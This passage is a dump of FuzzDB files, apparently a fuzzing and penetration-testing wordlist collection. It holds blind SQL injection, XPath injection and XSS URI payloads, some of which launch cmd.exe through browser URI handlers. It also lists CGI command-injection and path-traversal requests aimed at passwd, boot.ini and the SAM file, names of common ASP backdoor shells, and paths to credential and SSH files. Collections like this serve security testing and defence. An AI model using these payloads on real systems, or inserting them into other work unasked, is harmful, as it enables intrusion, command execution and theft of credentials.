| ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /fuzzdb/attack/string-expansion/shell-expansion.txt: -------------------------------------------------------------------------------- 1 | $HOME 2 | $ENV{'HOME'} 3 | %d 4 | %s 5 | {0} 6 | %*.*s 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/README.md: -------------------------------------------------------------------------------- 1 | Many of the files in this directory originated from the project 2 | https://github.com/minimaxir/big-list-of-naughty-strings 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/corrupted.txt: -------------------------------------------------------------------------------- 1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ 2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ 4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ 5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/emoji.txt: -------------------------------------------------------------------------------- 1 | 2 | 😍 3 | 👩🏽 4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 5 | 🐵 🙈 🙉 🙊 6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/japanese-emoticon.txt: -------------------------------------------------------------------------------- 1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ 2 | (。◕ ∀ ◕。) 3 | `ィ(´∀`∩ 4 | __ロ(,_,*) 5 | ・( ̄∀ ̄)・:*: 6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ 7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ 8 | (╯°□°)╯︵ ┻━┻) 9 | (ノಥ益ಥ)ノ ┻━┻ 10 | ┬─┬ノ( º _ ºノ) 11 | ( ͡° ͜ʖ ͡°) 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/naughty-unicode.txt: -------------------------------------------------------------------------------- 1 | Ω≈ç√∫˜µ≤≥÷ 2 | åß∂ƒ©˙∆˚¬…æ 3 | œ∑´®†¥¨ˆøπ“‘ 4 | ¡™£¢∞§¶•ªº–≠ 5 | ¸˛Ç◊ı˜Â¯˘¿ 6 | ÅÍÎÏ˝ÓÔÒÚÆ☃ 7 | Œ„´‰ˇÁ¨ˆØ∏”’ 8 | `⁄€‹›fifl‡°·‚—± 9 | ⅛⅜⅝⅞ 10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя 11 | ٠١٢٣٤٥٦٧٨٩ 12 | 13 | 14 | 15 | 16 | 17 | ⁰⁴⁵ 18 | ₀₁₂ 19 | ⁰⁴⁵₀₁₂ 20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/regionalindicators.txt: -------------------------------------------------------------------------------- 1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 3 | 🇺🇸🇷🇺🇸🇦 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/right-to-left.txt: -------------------------------------------------------------------------------- 1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. 2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ 3 | הָיְתָהtestالصفحات التّحول 4 | ﷽ 5 | ﷺ 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/specialchars.txt: -------------------------------------------------------------------------------- 1 | , 2 | . 3 | / 4 | ; 5 | ' 6 | [ 7 | ] 8 | \ 9 | - 10 | = 11 | < 12 | > 13 | ? 14 | : 15 | " 16 | { 17 | } 18 | | 19 | _ 20 | + 21 | ! 22 | @ 23 | # 24 | $ 25 | % 26 | ^ 27 | & 28 | * 29 | ( 30 | ) 31 | ` 32 | ~ 33 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/two-byte-chars.txt: -------------------------------------------------------------------------------- 1 | 田中さんにあげて下さい 2 | パーティーへ行かないか 3 | 和製漢語 4 | 部落格 5 | 사회과학원 어학연구소 6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 7 | 社會科學院語學研究所 8 | 울란바토르 9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/upsidedown.txt: -------------------------------------------------------------------------------- 1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 2 | 00˙Ɩ$- 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/xpath/README.md: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/xpath-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/xpath/xpath-injection.txt: -------------------------------------------------------------------------------- 1 | ' or '1'='1 2 | ' or ''=' 3 | x' or 1=1 or 'x'='y 4 | / 5 | // 6 | //* 7 | */* 8 | @* 9 | count(/child::node()) 10 | x' or name()='username' or 'x'='y 11 | ' and count(/*)=1 and '1'='1 12 | ' and count(/@*)=1 and '1'='1 13 | ' and count(/comment())=1 and '1'='1 -------------------------------------------------------------------------------- /fuzzdb/attack/xss/README.md: -------------------------------------------------------------------------------- 1 | test.xxe - requested by some payloads from fuzzdb github repo raw filepath
2 | xss-rsnake.fuzz.txt - rsnake's classic fuzzfile, modified to load http://xss.rocks test files
3 | xss-other.fuzz.txt - newer payloads from various sources: my own testing, interesting filter bypassed found in the wild, etc.
4 | xss-uri.fuzz.txt - URI abuse test cases
5 | XSSPolyglot.fuzz.txt - from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot - check the page for filter evasions and other interesting stuff 6 |
7 | 8 | 9 | HTML5 Cheatsheet 10 | * https://html5sec.org/ 11 | * https://github.com/cure53/H5SC 12 | 13 |
14 | 15 | WASC Script Mapping Project 16 | * http://projects.webappsec.org/w/page/13246958/Script%20Mapping 17 | 18 | 19 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/all-encodings-of-lt.txt: -------------------------------------------------------------------------------- 1 | < 2 | %3C 3 | < 4 | < 5 | < 6 | < 7 | < 8 | < 9 | < 10 | < 11 | < 12 | < 13 | < 14 | < 15 | < 16 | < 17 | < 18 | < 19 | < 20 | < 21 | < 22 | < 23 | < 24 | < 25 | < 26 | < 27 | < 28 | < 29 | < 30 | < 31 | < 32 | < 33 | < 34 | < 35 | < 36 | < 37 | < 38 | < 39 | < 40 | < 41 | < 42 | < 43 | < 44 | < 45 | < 46 | < 47 | < 48 | < 49 | < 50 | < 51 | < 52 | < 53 | < 54 | < 55 | < 56 | < 57 | < 58 | < 59 | < 60 | < 61 | < 62 | < 63 | < 64 | < 65 | < 66 | < 67 | \x3c 68 | \x3C 69 | \u003c 70 | \u003C 71 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/default-javascript-event-attributes.txt: -------------------------------------------------------------------------------- 1 | onAbort 2 | onBlur 3 | onChange 4 | onClick 5 | onDblClick 6 | onDragDrop 7 | onError 8 | onFocus 9 | onKeyDown 10 | onKeyPress 11 | onKeyUp 12 | onLoad 13 | onMouseDown 14 | onMouseMove 15 | onMouseOut 16 | onMouseOver 17 | onMouseUp 18 | onMove 19 | onReset 20 | onResize 21 | onSelect 22 | onSubmit 23 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/test.xxe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/xss-uri.txt: -------------------------------------------------------------------------------- 1 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 2 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 3 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 4 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 5 | firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 6 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 7 | -------------------------------------------------------------------------------- /fuzzdb/discovery/UserAgent/UserAgentListCommon.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 2 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 3 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 5 | Opera/9.20 (Windows NT 6.0; U; en) 6 | Opera/9.00 (Windows NT 5.1; U; en) 7 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50 8 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1 9 | Googlebot/2.1 ( http://www.googlebot.com/bot.html) 10 | Googlebot-Image/1.0 ( http://www.googlebot.com/bot.html) 11 | Mozilla/2.0 (compatible; Ask Jeeves) 12 | msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm) 13 | Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/531.21.10 14 | Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25 15 | Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 16 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 17 | Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 18 | Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 19 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 20 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) 21 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 -------------------------------------------------------------------------------- /fuzzdb/discovery/dns/CcTLD.txt: -------------------------------------------------------------------------------- 1 | ac 2 | ad 3 | ae 4 | af 5 | ag 6 | ai 7 | al 8 | am 9 | an 10 | ao 11 | aq 12 | ar 13 | as 14 | at 15 | au 16 | aw 17 | ax 18 | az 19 | ba 20 | bb 21 | bd 22 | be 23 | bf 24 | bg 25 | bh 26 | bi 27 | bj 28 | bl 29 | bm 30 | bn 31 | bo 32 | bq 33 | br 34 | bs 35 | bt 36 | bv 37 | bw 38 | by 39 | bz 40 | ca 41 | cc 42 | cd 43 | cf 44 | cg 45 | ch 46 | ci 47 | ck 48 | cl 49 | cm 50 | cn 51 | co 52 | cr 53 | cu 54 | cv 55 | cw 56 | cx 57 | cy 58 | cz 59 | dd 60 | de 61 | dj 62 | dk 63 | dm 64 | do 65 | dz 66 | ec 67 | ee 68 | eg 69 | eh 70 | er 71 | es 72 | et 73 | eu 74 | fi 75 | fj 76 | fk 77 | fm 78 | fo 79 | fr 80 | ga 81 | gb 82 | gd 83 | ge 84 | gf 85 | gg 86 | gh 87 | gi 88 | gl 89 | gm 90 | gn 91 | gp 92 | gq 93 | gr 94 | gs 95 | gt 96 | gu 97 | gw 98 | gy 99 | hk 100 | hm 101 | hn 102 | hr 103 | ht 104 | hu 105 | id 106 | ie 107 | il 108 | im 109 | in 110 | io 111 | iq 112 | ir 113 | is 114 | it 115 | je 116 | jm 117 | jo 118 | jp 119 | ke 120 | kg 121 | kh 122 | ki 123 | km 124 | kn 125 | kp 126 | kr 127 | kw 128 | ky 129 | kz 130 | la 131 | lb 132 | lc 133 | li 134 | lk 135 | lr 136 | ls 137 | lt 138 | lu 139 | lv 140 | ly 141 | ma 142 | mc 143 | md 144 | me 145 | mf 146 | mg 147 | mh 148 | mk 149 | ml 150 | mm 151 | mn 152 | mo 153 | mp 154 | mq 155 | mr 156 | ms 157 | mt 158 | mu 159 | mv 160 | mw 161 | mx 162 | my 163 | mz 164 | na 165 | nc 166 | ne 167 | nf 168 | ng 169 | ni 170 | nl 171 | no 172 | np 173 | nr 174 | nu 175 | nz 176 | om 177 | pa 178 | pe 179 | pf 180 | pg 181 | ph 182 | pk 183 | pl 184 | pm 185 | pn 186 | pr 187 | ps 188 | pt 189 | pw 190 | py 191 | qa 192 | re 193 | ro 194 | rs 195 | ru 196 | rw 197 | sa 198 | sb 199 | sc 200 | sd 201 | se 202 | sg 203 | sh 204 | si 205 | sj 206 | sk 207 | sl 208 | sm 209 | sn 210 | so 211 | sr 212 | ss 213 | st 214 | su 215 | sv 216 | sx 217 | sy 218 | sz 219 | tc 220 | td 221 | tf 222 | tg 223 | th 224 | tj 225 | tk 226 | tl 227 | tm 228 | tn 229 | to 230 | tp 231 | tr 232 | tt 233 | tv 234 | tw 235 | tz 236 | ua 237 | ug 238 | uk 239 | um 240 | us 241 | uy 242 | uz 243 | va 244 | vc 245 | ve 246 | vg 247 | vi 248 | vn 249 | vu 250 | wf 251 | ws 252 | ye 253 | yt 254 | yu 255 | za 256 | zm 257 | zw 258 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/Randomfiles.txt: -------------------------------------------------------------------------------- 1 | /accounts.txt 2 | /culeadora.txt 3 | /data.txt 4 | /database.txt 5 | /grabbed.html 6 | /info.txt 7 | /l0gs.txt 8 | /log.txt 9 | /logins.txt 10 | /logs.txt 11 | /members.txt 12 | /pass.txt 13 | /passes.txt 14 | /password.html 15 | /password.txt 16 | /passwords.html 17 | /passwords.txt 18 | /pazz.txt 19 | /pazzezs.txt 20 | /pw.txt 21 | /pws.txt 22 | /technico.txt 23 | /usernames.txt 24 | /users.txt 25 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/UnixDotfiles.txt: -------------------------------------------------------------------------------- 1 | /.DS_Store 2 | /.FBCIndex 3 | /.access 4 | /.addressbook 5 | /.bash_history 6 | /.bashrc 7 | /.cobalt 8 | /.cobalt/alert/service.cgi?service= 9 | /.cobalt/alert/service.cgi?service= 10 | /.cobalt/sysManage/../admin/.htaccess 11 | /.fhp 12 | /.forward 13 | /.history 14 | /.htaccess 15 | /.htaccess.old 16 | /.htaccess.save 17 | /.htaccess~ 18 | /.htpasswd 19 | /.lynx_cookies 20 | /.mysql_history 21 | /.nsconfig 22 | /.nsf/../winnt/win.ini 23 | /.passwd 24 | /.perf 25 | /.pinerc 26 | /.plan 27 | /.proclog 28 | /.procmailrc 29 | /.profile 30 | /.psql_history 31 | /.rhosts 32 | /.sh_history 33 | /.ssh 34 | /.ssh/authorized_keys 35 | /.ssh/known_hosts 36 | /.www_acl 37 | /.wwwacl 38 | /.access 39 | /.cobalt 40 | /.cobalt/alert/service.cgi?service= 41 | /.cobalt/alert/service.cgi?service= 42 | /.fhp 43 | /.htaccess 44 | /.htaccess.old 45 | /.htaccess.save 46 | /.htaccess~ 47 | /.htpasswd 48 | /.nsconfig 49 | /.passwd 50 | /.www_acl 51 | /.wwwacl 52 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | 3fexe.asp 2 | ASpy.asp 3 | EFSO.asp 4 | RemExp.asp 5 | aspxSH.asp 6 | aspxshell.aspx 7 | aspydrv.asp 8 | cmd.asp 9 | cmd.aspx 10 | cmdexec.aspx 11 | elmaliseker.asp 12 | filesystembrowser.aspx 13 | fileupload.aspx 14 | ntdaddy.asp 15 | spexec.aspx 16 | sql.aspx 17 | tool.asp 18 | tool.aspx 19 | toolaspshell.asp 20 | up.asp 21 | up.aspx 22 | zehir.asp 23 | zehir.aspx 24 | zehir4.asp 25 | zehir4.aspx 26 | cmd-asp-5.1.asp 27 | cmdasp.asp 28 | cmdasp.aspx 29 | list.asp 30 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt: -------------------------------------------------------------------------------- 1 | post-query 2 | Config1.htm 3 | My_eGallery/public/displayCategory.php 4 | servlet/custMsg?guestName= 19 | /athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' 20 | /mkilog.exe 21 | /mkplog.exe 22 | /MsmMask.exe?mask=/junk334 23 | /MsmMask.exe?mask=/junk334 24 | /MsmMask.exe?mask=/junk334 25 | /MsmMask.exe?mask=/junk334 26 | /MsmMask.exe?mask=/junk334 27 | /perl.exe?-v 28 | /perl.exe 29 | /ppdscgi.exe 30 | /c32web.exe/ChangeAdminPassword 31 | /windmail.exe 32 | /dbmlparser.exe 33 | /cgimail.exe 34 | /minimal.exe 35 | /rguest.exe 36 | /visitor.exe 37 | /webbbs.exe 38 | /wguest.exe 39 | //_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 40 | /cfgwiz.exe 41 | /Cgitest.exe 42 | /mailform.exe 43 | /post16.exe 44 | /imagemap.exe 45 | /htimage.exe/path/filename?2,2 46 | /htimage.exe 47 | /Webnews.exe 48 | /texis.exe/junk 49 | /apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ 50 | /sensepost.exe?/c+dir 51 | /testcgi.exe 52 | /testcgi.exe? 53 | /ion-p.exe?page=c:\winnt\repair\sam 54 | /../../../../../../../../../../WINNT/system32/ipconfig.exe 55 | /NUL/../../../../../../../../../WINNT/system32/ipconfig.exe 56 | /PRN/../../../../../../../../../WINNT/system32/ipconfig.exe 57 | /c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 58 | /foxweb.dll 59 | /wconsole.dll 60 | /shtml.dll 61 | /scripts/slxweb.dll/getfile?type=Library&file=[invalid 62 | /filename] 63 | /rightfax/fuwww.dll/? 64 | /WINDMAIL.EXE?%20-n%20c:\boot.ini% 65 | /WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\ 66 | /GW5/GWWEB.EXE 67 | /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA 68 | /GW5/GWWEB.EXE?HELP=bad-request 69 | /GWWEB.EXE?HELP=bad-request 70 | /echo.bat 71 | /echo.bat?&dir+c:\\ 72 | /hello.bat?&dir+c:\\ 73 | /input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 74 | /input2.bat?|dir 75 | /input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 76 | /test-cgi.bat 77 | /test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 78 | /tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, 79 | /_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X 80 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/README.md: -------------------------------------------------------------------------------- 1 | **CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/ 2 | use the provided lists for q&d but cms explorer does a lot more. 3 | 4 | **wordpress.fuzz.txt** 5 | generated by bringing the filenames from each incremental new version of wordpress into one fuzzfile 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/joomla_themes.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/wp_common_theme_files.txt: -------------------------------------------------------------------------------- 1 | 404.php 2 | archive.php 3 | archives.php 4 | author.php 5 | category.php 6 | comments.php 7 | content.php 8 | data.php 9 | footer.php 10 | functions.php 11 | header.php 12 | home.php 13 | image.php 14 | images 15 | images/content-bg.jpg 16 | images/footer.jpg 17 | images/footer.png 18 | images/functions.php 19 | images/gravatar.png 20 | images/header-bg.jpg 21 | images/header.png 22 | images/index.php 23 | images/main_bg.png 24 | images/rss.png 25 | images/Thumbs.db 26 | index.php 27 | js 28 | js/html5.js 29 | languages 30 | license.txt 31 | License.txt 32 | links.php 33 | page.php 34 | print.css 35 | readme.txt 36 | reset.css 37 | rtl.css 38 | RTL.css 39 | searchform.php 40 | search.php 41 | sidebar.php 42 | single.php 43 | style.css 44 | tag.php 45 | tags.php 46 | 47 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/wp_themes.readme: -------------------------------------------------------------------------------- 1 | Themes usually live in a directory called wp-content. 2 | 3 | Determine how the server handles directories which aren't present vs files which aren't present in a path that exists in order to tell which themes are installed. 4 | 5 | use wp_common_theme_files.fuzz.php inside the identified theme dirs 6 | 7 | Often you can tell the current theme by viewing source. 8 | 9 | Theme list generated last on Sept 6 2013 10 | 11 | from: http://themes.svn.wordpress.org 12 | 13 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/CommonWebExtensions.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 | .php 20 | .php2 21 | .php3 22 | .php4 23 | .php5 24 | .php6 25 | .php7 26 | .phtml 27 | .phps 28 | .pl 29 | .reg 30 | .sh 31 | .shtml 32 | .sql 33 | .txt 34 | .xml 35 | .swf 36 | .pcap 37 | .001 38 | .002 39 | .1 40 | .2 41 | .7z 42 | .Z 43 | .back 44 | .backup 45 | .bak 46 | .bakup 47 | .bas 48 | .bz2 49 | .c 50 | .conf 51 | .copia 52 | .core 53 | .cpp 54 | .dat 55 | .db 56 | .default 57 | .dll 58 | .doc 59 | .ini 60 | .jar 61 | .java 62 | .old 63 | .orig 64 | .pas 65 | .rar 66 | .sav 67 | .saved 68 | .source 69 | .src 70 | .stackdump 71 | .tar 72 | .tar.gz 